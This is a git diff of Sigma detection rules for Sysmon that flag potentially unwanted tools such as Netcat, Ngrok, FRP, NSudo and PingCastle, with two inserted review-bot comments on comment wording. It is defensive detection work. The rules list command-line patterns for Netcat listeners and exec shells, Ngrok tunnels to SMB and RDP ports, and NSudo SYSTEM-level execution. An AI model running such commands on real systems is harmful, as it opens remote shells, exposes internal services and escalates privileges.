@@ -1,8 +1,7 @@ title: PUA - CsExec Execution id: d08a2711-ee8b-4323-bdec-b7d85e892b31 status: test -description: Detects the use of the lesser known remote execution tool named CsExec - a PsExec alternative +description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative references: - https://github.com/malcomvetter/CSExec - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml index 8aeb49be9..e89ca3b3d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml @@ -1,9 +1,7 @@ title: PUA - DefenderCheck Execution id: f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 status: test -description: Detects the use of DefenderCheck, a tool to evaluate the signatures used - in Microsoft Defender. It can be used to figure out the strings / byte chains - used in Microsoft Defender to detect a tool and thus used for AV evasion. +description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. references: - https://github.com/matterpreter/DefenderCheck author: Florian Roth (Nextron Systems) @@ -21,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \DefenderCheck.exe - - Description: DefenderCheck + - Image|endswith: \DefenderCheck.exe + - Description: DefenderCheck condition: process_creation and selection falsepositives: - Unlikely 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml index 763c0e385..742ce7ef4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml @@ -1,8 +1,7 @@ title: PUA - DIT Snapshot Viewer id: d3b70aad-097e-409c-9df2-450f80dc476b status: test -description: Detects the use of Ditsnap tool, an inspection tool for Active Directory - database, ntds.dit. +description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. references: - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \ditsnap.exe - - CommandLine|contains: ditsnap.exe + - Image|endswith: \ditsnap.exe + - CommandLine|contains: ditsnap.exe condition: process_creation and selection falsepositives: - Legitimate admin usage diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml index ef3a33794..d2890df92 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml @@ -1,8 +1,7 @@ title: PUA - Fast Reverse Proxy (FRP) Execution id: 32410e29-5f94-4568-b6a3-d91a8adad863 status: test -description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to - help you expose a local server behind a NAT or firewall to the Internet. +description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. references: - https://asec.ahnlab.com/en/38156/ - https://github.com/fatedier/frp 
@@ -25,15 +24,16 @@ detection: - \frpc.exe - \frps.exe selection_cli: - CommandLine|contains: \frpc.ini + CommandLine|contains: \frpc.ini selection_hashes: - - Hashes|contains: - - MD5=7D9C233B8C9E3F0EA290D2B84593C842 - - SHA1=06DDC9280E1F1810677935A2477012960905942F - - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C - - md5: 7d9c233b8c9e3f0ea290d2b84593c842 - - sha1: 06ddc9280e1f1810677935a2477012960905942f - - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c + # v0.44.0 + - Hashes|contains: + - MD5=7D9C233B8C9E3F0EA290D2B84593C842 + - SHA1=06DDC9280E1F1810677935A2477012960905942F + - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C + - md5: 7d9c233b8c9e3f0ea290d2b84593c842 + - sha1: 06ddc9280e1f1810677935a2477012960905942f + - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml index 097538ec9..3a6042bf1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml @@ -1,8 +1,7 @@ title: PUA- IOX Tunneling Tool Execution id: d7654f02-e04b-4934-9838-65c46f187ebc status: test -description: Detects the use of IOX - a tool for port forwarding and intranet proxy - purposes +description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes references: - https://github.com/EddieIvan01/iox author: Florian Roth (Nextron Systems) 
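Review bot: The bare `# v0.44.0` comment added above `selection_hashes` (and `# v0.4` in the proc_creation_win_pua_iox.yml hunk on the next line) does not say what the version refers to, and next to a rule that also carries a `modified` date it could be read as a rule version. Suggest `# Hashes of the v0.44.0 release; other releases are only matched via selection_img / selection_cli`, which also makes explicit that, with `condition: process_creation and (1 of selection_*)`, the hash branch is independent of the image and command-line branches.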
@@ -22,19 +21,20 @@ detection: selection: Image|endswith: \iox.exe selection_commandline: - CommandLine|contains: + CommandLine|contains: - '.exe fwd -l ' - '.exe fwd -r ' - '.exe proxy -l ' - '.exe proxy -r ' selection_hashes: - - Hashes|contains: - - MD5=9DB2D314DD3F704A02051EF5EA210993 - - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD - - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 - - md5: 9db2d314dd3f704a02051ef5ea210993 - - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd - - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 + # v0.4 + - Hashes|contains: + - MD5=9DB2D314DD3F704A02051EF5EA210993 + - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD + - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 + - md5: 9db2d314dd3f704a02051ef5ea210993 + - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd + - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 condition: process_creation and (1 of selection*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml index 6c23f8d2a..41d8104bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml 
@@ -1,9 +1,7 @@ title: PUA - Mouse Lock Execution id: c9192ad9-75e5-43eb-8647-82a0a5b493e3 status: test -description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate - tool "Mouse Lock" as being used for both credential access and collection in security - incidents. +description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. references: - https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf - https://sourceforge.net/projects/mouselock/ @@ -23,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: Mouse Lock - - Company|contains: Misc314 - - CommandLine|contains: Mouse Lock_ + - Product|contains: Mouse Lock + - Company|contains: Misc314 + - CommandLine|contains: Mouse Lock_ condition: process_creation and selection fields: - Product diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml index c5e4990ae..6c9116090 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml @@ -1,9 +1,7 @@ title: PUA - Netcat Suspicious Execution id: e31033fc-33f0-4020-9a16-faf9b31cbf08 status: test -description: Detects execution of Netcat. Adversaries may use a non-application layer - protocol for communication between host and C2 server or among infected hosts - within a network +description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md 
@@ -23,17 +21,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: + # can not use OriginalFileName as is empty Image|endswith: - \nc.exe - \ncat.exe - \netcat.exe selection_cmdline: - CommandLine|contains: + # Typical command lines + CommandLine|contains: - ' -lvp ' - ' -lvnp' - ' -l -v -p ' - ' -lv -p ' - ' -l --proxy-type http ' + # - ' --exec cmd.exe ' # Not specific enough for netcat - ' -vnl --exec ' - ' -vnl -e ' - ' --lua-exec ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml index 54ba52f41..349eefc2c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml @@ -1,12 +1,9 @@ title: PUA - Ngrok Execution id: ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31 status: test -description: 'Detects the use of Ngrok, a utility used for port forwarding and tunneling, - often used by threat actors to make local protected services publicly available. - +description: | + Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections. - - ' references: - https://ngrok.com/docs - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html 
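Review bot: The comment `# can not use OriginalFileName as is empty` added above `Image|endswith:` in the netcat hunk is shorthand that a reader has to decode; I'd spell the reason out, `# OriginalFileName is not used because it is empty in the netcat binaries`, so it is clear the field is absent rather than merely unreliable. The `# Typical command lines` header and the disabled `--exec cmd.exe` pattern with its `# Not specific enough for netcat` reason are the right kind of annotation and could use the same plain-sentence style. The rest of `selection_cmdline` continues below the hunk.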
@@ -30,26 +27,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - ' tcp 139' - ' tcp 445' - ' tcp 3389' - ' tcp 5985' - ' tcp 5986' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' start ' - --all - --config - .yml selection3: Image|endswith: ngrok.exe - CommandLine|contains: + CommandLine|contains: - ' tcp ' - ' http ' - ' authtoken ' selection4: - CommandLine|contains: + CommandLine|contains: - '.exe authtoken ' - .exe start --all condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml index 2cb1a8b87..7f00427ea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml @@ -1,8 +1,7 @@ title: PUA - Nimgrab Execution id: 74a12f18-505c-4114-8d0b-8448dd5485c6 status: test -description: Detects the usage of nimgrab, a tool bundled with the Nim programming - framework and used for downloading files. +description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. references: - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md author: frack113 
@@ -27,9 +26,9 @@ detection: - SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45 selection_hash: - - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B - - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 + - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B + - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 + - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use of Nim on a developer systems diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml index 3c543a9d4..2c8b9204a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml @@ -1,8 +1,7 @@ title: PUA - NirCmd Execution id: 4e2ed651-1906-4a59-a78a-18220fca1b22 status: test -description: Detects the use of NirCmd tool for command execution, which could be - the result of legitimate administrative activity +description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity references: - https://www.nirsoft.net/utils/nircmd.html - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ 
@@ -23,20 +22,20 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_org:
- - Image|endswith: \NirCmd.exe
- - OriginalFileName: NirCmd.exe
+ - Image|endswith: \NirCmd.exe
+ - OriginalFileName: NirCmd.exe
selection_cmd:
- CommandLine|contains:
+ CommandLine|contains:
- ' execmd '
- '.exe script '
- '.exe shexec '
- ' runinteractive '
combo_exec:
- CommandLine|contains:
+ CommandLine|contains:
- ' exec '
- ' exec2 '
combo_exec_params:
- CommandLine|contains:
+ CommandLine|contains:
- ' show '
- ' hide '
condition: process_creation and (1 of selection_* or all of combo_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml
index abe5ac5c2..736fd4d52 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml
@@ -22,7 +22,7 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains: ' runassystem '
+ CommandLine|contains: ' runassystem '
condition: process_creation and selection
fields:
- CommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml
index b8012d49a..456824f8b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml
@@ -1,9 +1,7 @@ title: PUA - Nmap/Zenmap Execution id: f6ecd1cf-19b8-4488-97f6-00f0924991a3 status: test -description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing - of services running on remote hosts, including those that may be vulnerable to - remote software exploitation +description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation references: - https://nmap.org/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows @@ -22,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \nmap.exe - - \zennmap.exe - - OriginalFileName: - - nmap.exe - - zennmap.exe + - Image|endswith: + - \nmap.exe + - \zennmap.exe + - OriginalFileName: + - nmap.exe + - zennmap.exe condition: process_creation and selection falsepositives: - Legitimate administrator activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml index f46d8bdcf..f30fe9d2a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml @@ -1,8 +1,7 @@ title: PUA - NPS Tunneling Tool Execution id: 68d37776-61db-42f5-bf54-27e87072d17e status: test -description: Detects the use of NPS, a port forwarding and intranet penetration proxy - server +description: Detects the use of NPS, a port forwarding and intranet penetration proxy server references: - https://github.com/ehang-io/nps author: Florian Roth (Nextron Systems) 
@@ -22,20 +21,21 @@ detection:
selection_img:
Image|endswith: \npc.exe
selection_cli_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -server='
- ' -vkey='
- ' -password='
selection_cli_2:
- CommandLine|contains: ' -config=npc'
+ CommandLine|contains: ' -config=npc'
selection_hashes:
- - Hashes|contains:
- - MD5=AE8ACF66BFE3A44148964048B826D005
- - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181
- - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856
- - md5: ae8acf66bfe3a44148964048b826d005
- - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181
- - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856
+ # v0.26.10
+ - Hashes|contains:
+ - MD5=AE8ACF66BFE3A44148964048B826D005
+ - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181
+ - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856
+ - md5: ae8acf66bfe3a44148964048b826d005
+ - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181
+ - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856
condition: process_creation and (1 of selection_*)
falsepositives:
- Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml
index 9a0fa4bd5..d44a9c0af 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml
@@ -21,22 +21,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \NSudo.exe - - \NSudoLC.exe - - \NSudoLG.exe - - OriginalFileName: - - NSudo.exe - - NSudoLC.exe - - NSudoLG.exe + - Image|endswith: + - \NSudo.exe + - \NSudoLC.exe + - \NSudoLG.exe + - OriginalFileName: + - NSudo.exe + - NSudoLC.exe + - NSudoLG.exe selection_cli: - CommandLine|contains: - - '-U:S ' - - '-U:T ' - - '-U:E ' - - '-P:E ' - - '-M:S ' - - '-M:H ' + CommandLine|contains: + # Covers Single/Double dash "-"/"--" + ":" + - '-U:S ' # System + - '-U:T ' # Trusted Installer + - '-U:E ' # Elevated + - '-P:E ' # Enable All Privileges + - '-M:S ' # System Integrity + - '-M:H ' # High Integrity + # Covers Single/Double dash "-"/"--" + "=" - '-U=S ' - '-U=T ' - '-U=E ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml index 9baf42af2..b4a7fda43 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml @@ -1,11 +1,10 @@ title: PUA - PingCastle Execution id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c related: - - id: b37998de-a70b-4f33-b219-ec36bf433dc0 - type: derived + - id: b37998de-a70b-4f33-b219-ec36bf433dc0 + type: derived status: experimental -description: Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level. +description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ 
@@ -28,162 +27,164 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Hashes|contains: - - MD5=f741f25ac909ee434e50812d436c73ff - - MD5=d40acbfc29ee24388262e3d8be16f622 - - MD5=01bb2c16fadb992fa66228cd02d45c60 - - MD5=9e1b18e62e42b5444fc55b51e640355b - - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 - - MD5=324579d717c9b9b8e71d0269d13f811f - - MD5=63257a1ddaf83cfa43fe24a3bc06c207 - - MD5=049e85963826b059c9bac273bb9c82ab - - MD5=ecb98b7b4d4427eb8221381154ff4cb2 - - MD5=faf87749ac790ec3a10dd069d10f9d63 - - MD5=f296dba5d21ad18e6990b1992aea8f83 - - MD5=93ba94355e794b6c6f98204cf39f7a11 - - MD5=a258ef593ac63155523a461ecc73bdba - - MD5=97000eb5d1653f1140ee3f47186463c4 - - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 - - MD5=32fe9f0d2630ac40ea29023920f20f49 - - MD5=a05930dde939cfd02677fc18bb2b7df5 - - MD5=124283924e86933ff9054a549d3a268b - - MD5=ceda6909b8573fdeb0351c6920225686 - - MD5=60ce120040f2cd311c810ae6f6bbc182 - - MD5=2f10cdc5b09100a260703a28eadd0ceb - - MD5=011d967028e797a4c16d547f7ba1463f - - MD5=2da9152c0970500c697c1c9b4a9e0360 - - MD5=b5ba72034b8f44d431f55275bace9f8b - - MD5=d6ed9101df0f24e27ff92ddab42dacca - - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d - - MD5=5e083cd0143ae95a6cb79b68c07ca573 - - MD5=28caff93748cb84be70486e79f04c2df - - MD5=9d4f12c30f9b500f896efd1800e4dd11 - - MD5=4586f7dd14271ad65a5fb696b393f4c0 - - MD5=86ba9dddbdf49215145b5bcd081d4011 - - MD5=9dce0a481343874ef9a36c9a825ef991 - - MD5=85890f62e231ad964b1fda7a674747ec - - MD5=599be548da6441d7fe3e9a1bb8cb0833 - - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 - - MD5=32d45718164205aec3e98e0223717d1d - - MD5=6ff5f373ee7f794cd17db50704d00ddb - - MD5=88efbdf41f0650f8f58a3053b0ca0459 - - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 - - MD5=781fa16511a595757154b4304d2dd350 - - MD5=5018ec39be0e296f4fc8c8575bfa8486 - - MD5=f4a84d6f1caf0875b50135423d04139f - - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b - - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 - - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d - - 
SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f - - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa - - SHA1=f14c9633040897d375e3069fddc71e859f283778 - - SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc - - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 - - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 - - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b - - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc - - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 - - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 - - SHA1=607e1fa810c799735221a609af3bfc405728c02d - - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 - - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a - - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 - - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 - - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 - - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 - - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea - - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 - - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 - - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad - - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 - - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 - - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 - - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a - - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db - - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 - - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 - - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 - - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c - - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d - - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 - - SHA1=c82152cddf9e5df49094686531872ecd545976db - - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 - - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 - - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 - - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d - - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 - - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 - - 
SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b - - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 - - SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 - - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 - - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f - - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a - - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 - - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b - - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 - - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae - - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 - - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a - - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 - - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 - - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 - - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef - - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d - - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 - - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b - - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b - - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 - - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 - - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca - - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea - - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 - - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 - - 
SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 - - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 - - SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 - - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 - - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 - - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 - - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 - - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d - - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 - - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 - - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 - - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 - - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 - - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 - - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 - - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd - - Image|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - 